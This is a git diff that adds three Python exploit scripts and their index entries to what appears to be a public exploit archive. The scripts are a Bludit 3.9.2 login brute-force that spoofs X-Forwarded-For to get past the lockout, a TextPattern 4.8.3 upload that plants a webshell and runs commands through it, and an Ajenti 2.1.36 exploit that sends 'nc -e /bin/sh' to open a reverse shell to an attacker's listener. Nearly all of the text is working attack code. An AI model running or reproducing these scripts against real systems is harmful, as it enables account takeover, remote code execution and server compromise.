Version: <= 3.9.2 + +# Vulnerability +## Discoverer: Rastating +## Discoverer website: https://rastating.github.io/ +## CVE: CVE-2019-17240 https://nvd.nist.gov/vuln/detail/CVE-2019-17240 +## References: https://rastating.github.io/bludit-brute-force-mitigation-bypass/ +## Patch: https://github.com/bludit/bludit/pull/1090 + +''' +Example Usage: +- ./exploit.py -l http://127.0.0.1/admin/login.php -u user.txt -p pass.txt +''' + +import requests +import sys +import re +import argparse, textwrap +from pwn import * + +#Expected Arguments +parser = argparse.ArgumentParser(description="Bludit <= 3.9.2 Auth Bruteforce Mitigation Bypass", formatter_class=argparse.RawTextHelpFormatter, +epilog=textwrap.dedent(''' +Exploit Usage : +./exploit.py -l http://127.0.0.1/admin/login.php -u user.txt -p pass.txt +./exploit.py -l http://127.0.0.1/admin/login.php -u /Directory/user.txt -p /Directory/pass.txt''')) + +parser.add_argument("-l","--url", help="Path to Bludit (Example: http://127.0.0.1/admin/login.php)") +parser.add_argument("-u","--userlist", help="Username Dictionary") +parser.add_argument("-p","--passlist", help="Password Dictionary") +args = parser.parse_args() + +if len(sys.argv) < 2: + print (f"Exploit Usage: ./exploit.py -h [help] -l [url] -u [user.txt] -p [pass.txt]") + sys.exit(1) + +# Variable +LoginPage = args.url +Username_list = args.userlist +Password_list = args.passlist + +log.info('Bludit Auth BF Mitigation Bypass Script by ColdFusionX \n ') + +def login(Username,Password): + session = requests.session() + r = session.get(LoginPage) + +# Progress Check + process = log.progress('Brute Force') + +#Getting CSRF token value + CSRF = re.search(r'input type="hidden" id="jstokenCSRF" name="tokenCSRF" value="(.*?)"', r.text) + CSRF = CSRF.group(1) + +#Specifying Headers Value + headerscontent = { + 'User-Agent' : 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0', + 'Referer' : f"{LoginPage}", + 'X-Forwarded-For' : f"{Password}" + } + +#POST REQ data + postreqcontent = { + 'tokenCSRF' : f"{CSRF}", + 'username' : f"{Username}", + 'password' : f"{Password}" + } + +#Sending POST REQ + r = session.post(LoginPage, data = postreqcontent, headers = headerscontent, allow_redirects= False) + +#Printing Username:Password + process.status('Testing -> {U}:{P}'.format(U = Username, P = Password)) + +#Conditional loops + if 'Location' in r.headers: + if "/admin/dashboard" in r.headers['Location']: + print() + log.info(f'SUCCESS !!') + log.success(f"Use Credential -> {Username}:{Password}") + sys.exit(0) + elif "has been blocked" in r.text: + log.failure(f"{Password} - Word BLOCKED") + +#Reading User.txt & Pass.txt files +userfile = open(Username_list).readlines() +for Username in userfile: + Username = Username.strip() + +passfile = open(Password_list).readlines() +for Password in passfile: + Password = Password.strip() + login(Username,Password) \ No newline at end of file diff --git a/exploits/php/webapps/48943.py b/exploits/php/webapps/48943.py new file mode 100755 index 000000000..4d4a46950 --- /dev/null +++ b/exploits/php/webapps/48943.py @@ -0,0 +1,158 @@ +#!/usr/bin/python3 + +# Exploit Title: TextPattern <= 4.8.3 - Authenticated Remote Code Execution via Unrestricted File Upload +# Google Dork: N/A +# Date: 16/10/2020 +# Exploit Author: Michele '0blio_' Cisternino +# Vendor Homepage: https://textpattern.com/ +# Software Link: https://github.com/textpattern/textpattern +# Version: <= 4.8.3 +# Tested on: Kali Linux x64 +# CVE: N/A + +import sys +import json +import requests +from bs4 import BeautifulSoup as bs4 +from time import sleep +import random +import string +import readline + +# Disable SSL warnings +requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning) + +# Simple Terminal User Interface class I wrote to print run-time logs and headers +class Tui (): + def __init__ (self): + self.red = '\033[91m' + self.green = '\033[92m' + self.blue = '\033[94m' + self.yellow = '\033[93m' + self.pink = '\033[95m' + self.end = '\033[0m' + self.bold = '\033[1m' + + def header (self, software, author, cve='N/A'): + print ("\n", "{}Software:{} {}".format(self.pink, self.end, software), sep='') + print ("{}CVE:{} {}".format(self.pink, self.end, cve)) + print ("{}Author:{} {}\n".format(self.pink, self.end, author)) + + def info (self, message): + print ("[{}*{}] {}".format(self.blue, self.end, message)) + + def greatInfo (self, message): + print ("[{}*{}] {}{}{}".format(self.blue, self.end, self.bold, message, self.end)) + + def success (self, message): + print ("[{}✓{}] {}{}{}".format(self.green, self.end, self.bold, message, self.end)) + + def warning (self, message): + print ("[{}!{}] {}".format(self.yellow, self.end, message)) + + def error (self, message): + print ("[{}✗{}] {}".format(self.red, self.end, message)) + +log = Tui() +log.header (software="TextPattern <= 4.8.3", cve="CVE-2020-XXXXX - Authenticated RCE via Unrestricted File Upload", author="Michele '0blio_' Cisternino") + +if len(sys.argv) < 4: + log.info ("USAGE: python3 exploit.py http://target.com username password") + log.info ("EXAMPLE: python3 exploit.py http://localhost admin admin\n") + sys.exit() + +# Get input from the command line +target, username, password = sys.argv[1:4] + +# Fixing URL +target = target.strip() +if not target.startswith("https://") and not target.startswith("http://"): + target = "http://" + target +if not target.endswith("/"): + target = target + "/" + +accessData = {'p_userid':username, 'p_password':password, '_txp_token':""} + +# Login +log.info ("Authenticating to the target as '{}'".format(username)) +s = requests.Session() +try: + r = s.post(target + "textpattern/index.php", data=accessData, verify=False) + sleep(1) + if r.status_code == 200: + log.success ("Logged in as '{}' (Cookie: txp_login={}; txp_login_public={})".format(username, s.cookies['txp_login'], s.cookies['txp_login_public'])) + sleep(1) + + # Parsing the response to find the upload token inside the main json array + log.info ("Grabbing _txp_token (required to proceed with exploitation)..") + soup = bs4(r.text, 'html.parser') + scriptJS = soup.find_all("script")[2].string.replace("var textpattern = ", "")[:-2] + scriptJS = json.loads(scriptJS) + uploadToken = scriptJS['_txp_token'] + log.greatInfo ("Upload token grabbed successfully ({})".format(uploadToken)) + + # The server reply with a 401 with the user provide wrong creds as input + elif r.status_code == 401: + log.error ("Unable to login. You provided wrong credentials..\n") + sys.exit() +except requests.exceptions.ConnectionError: + log.error ("Unable to connect to the target!") + sys.exit() + +# Crafting the upload request here +headers = { + "User-Agent" : "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko", + "Accept" : "text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01", + "Accept-Encoding" : "gzip, deflate", + "X-Requested-With" : "XMLHttpRequest", + "Connection" : "close", +} + +# Generating random webshell name +randomFilename = ''.join(random.choice(string.ascii_letters) for i in range(10)) + '.php' + +# Mapping multiparts here +multipart_form_data = { + "fileInputOrder" : (None, '1/1'), + "app_mode" : (None, 'async'), + "MAX_FILE_SIZE" : (None, '2000000'), + "event" : (None, 'file'), + "step" : (None, 'file_insert'), + "id" : (None, ' '), + "_txp_token" : (None, uploadToken), # Token here + "thefile[]" : (randomFilename, '') # lol +} + +# Uploading the webshell +log.warning ("Sending payload..") + +try: + r = s.post (target + "textpattern/index.php?event=file", verify=False, headers=headers, files=multipart_form_data) + if "Files uploaded" in r.text: + log.success ("Webshell uploaded successfully as {}".format(randomFilename)) +except: + log.error ("Unexpected error..") + sys.exit() + +sleep(2) + +# Interact with the webshell (using the readline library to save the history of the executed commands at run-time) +log.greatInfo ("Interacting with the HTTP webshell..") +sleep (1) +print() + +while 1: + try: + cmd = input ("\033[4m\033[91mwebshell\033[0m > ") + if cmd == 'exit': + raise KeyboardInterrupt + r = requests.get (target + "files/" + randomFilename + "?efcd=" + cmd, verify=False) + print (r.text) + except KeyboardInterrupt: + log.warning ("Stopped.") + exit() + except: + log.error ("Unexpected error..") + sys.exit() + +print() \ No newline at end of file diff --git a/exploits/python/webapps/48929.py b/exploits/python/webapps/48929.py new file mode 100755 index 000000000..3529c82f8 --- /dev/null +++ b/exploits/python/webapps/48929.py @@ -0,0 +1,53 @@ + #!/usr/bin/python3 + +import requests +import sys +import warnings +from bs4 import BeautifulSoup +import json + +warnings.filterwarnings("ignore", category=UserWarning, module='bs4') + +if len(sys.argv) < 6: + print("Usage: ./exploit.py http(s)://url username password listenerIP listenerPort") + exit() + +url = sys.argv[1] +username = sys.argv[2] +password = sys.argv[3] +ip = sys.argv[4] +port = sys.argv[5] + +req = requests.session() +login_creds = { + "username":username, + "password":password, + "mode":"normal"} + + + +print("[+] Sendin login request...") +login = req.post(url+"/api/core/auth", json = login_creds) + + +if username in login.text: + + page = url + "/api/terminal/create" + + payload = { + + 'command':'nc -e /bin/sh ' + ip + ' ' + port , + 'autoclose':True + + + } + payload = json.dumps(payload) + print("[+] Sending payload...") + + send_payload = req.post(page, payload) + + print("[+] Check your listener !...") + +else: + print("[-] Wrong credentials or may the system patched.") + exit() \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index ab5e87ad1..dfcd07756 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -40746,6 +40746,22 @@ id,file,description,date,author,type,platform,port 48925,exploits/php/webapps/48925.txt,"Stock Management System 1.0 - 'Categories Name' Persistent Cross-Site Scripting",2020-10-21,"Adeeb Shah",webapps,php, 48926,exploits/php/webapps/48926.txt,"Stock Management System 1.0 - 'Brand Name' Persistent Cross-Site Scripting",2020-10-21,"Adeeb Shah",webapps,php, 48927,exploits/php/webapps/48927.py,"Tiki Wiki CMS Groupware 21.1 - Authentication Bypass",2020-10-21,"Maximilian Barz",webapps,php, +48928,exploits/php/webapps/48928.txt,"Online Library Management System 1.0 - Arbitrary File Upload",2020-10-23,"Jyotsna Adhana",webapps,php, +48929,exploits/python/webapps/48929.py,"Ajenti 2.1.36 - Remote Code Execution (Authenticated)",2020-10-23,"Ahmet Ümit BAYRAM",webapps,python, +48930,exploits/php/webapps/48930.txt,"Stock Management System 1.0 - 'brandId and categoriesId' SQL Injection",2020-10-23,"Ihsan Sencan",webapps,php, +48931,exploits/php/webapps/48931.txt,"Car Rental Management System 1.0 - Arbitrary File Upload",2020-10-23,"Jyotsna Adhana",webapps,php, +48932,exploits/php/webapps/48932.txt,"User Registration & Login and User Management System 2.1 - SQL Injection",2020-10-23,"Ihsan Sencan",webapps,php, +48933,exploits/php/webapps/48933.txt,"Point of Sales 1.0 - 'id' SQL Injection",2020-10-23,"Ankita Pal",webapps,php, +48934,exploits/php/webapps/48934.txt,"Lot Reservation Management System 1.0 - Authentication Bypass",2020-10-23,"Ankita Pal",webapps,php, +48935,exploits/php/webapps/48935.txt,"Lot Reservation Management System 1.0 - Cross-Site Scripting (Stored)",2020-10-23,"Ankita Pal",webapps,php, +48936,exploits/php/webapps/48936.txt,"Gym Management System 1.0 - 'id' SQL Injection",2020-10-23,"Jyotsna Adhana",webapps,php, +48937,exploits/php/webapps/48937.txt,"Point of Sales 1.0 - 'username' SQL Injection",2020-10-23,"Jyotsna Adhana",webapps,php, +48938,exploits/php/webapps/48938.txt,"School Faculty Scheduling System 1.0 - 'id' SQL Injection",2020-10-23,"Jyotsna Adhana",webapps,php, +48939,exploits/php/webapps/48939.txt,"School Faculty Scheduling System 1.0 - 'username' SQL Injection",2020-10-23,"Jyotsna Adhana",webapps,php, +48940,exploits/php/webapps/48940.txt,"Gym Management System 1.0 - Authentication Bypass",2020-10-23,"Jyotsna Adhana",webapps,php, +48941,exploits/php/webapps/48941.txt,"Gym Management System 1.0 - Stored Cross Site Scripting",2020-10-23,"Jyotsna Adhana",webapps,php, +48942,exploits/php/webapps/48942.py,"Bludit 3.9.2 - Auth Bruteforce Bypass",2020-10-23,"Mayank Deshmukh",webapps,php, +48943,exploits/php/webapps/48943.py,"TextPattern CMS 4.8.3 - Remote Code Execution (Authenticated)",2020-10-23,0blio_,webapps,php, 42884,exploits/multiple/webapps/42884.py,"Fibaro Home Center 2 - Remote Command Execution / Privilege Escalation",2017-02-22,forsec,webapps,multiple, 42805,exploits/php/webapps/42805.txt,"WordPress Plugin WPAMS - SQL Injection",2017-09-26,"Ihsan Sencan",webapps,php, 42889,exploits/php/webapps/42889.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Private Key Disclosure",2017-09-28,hyp3rlinx,webapps,php,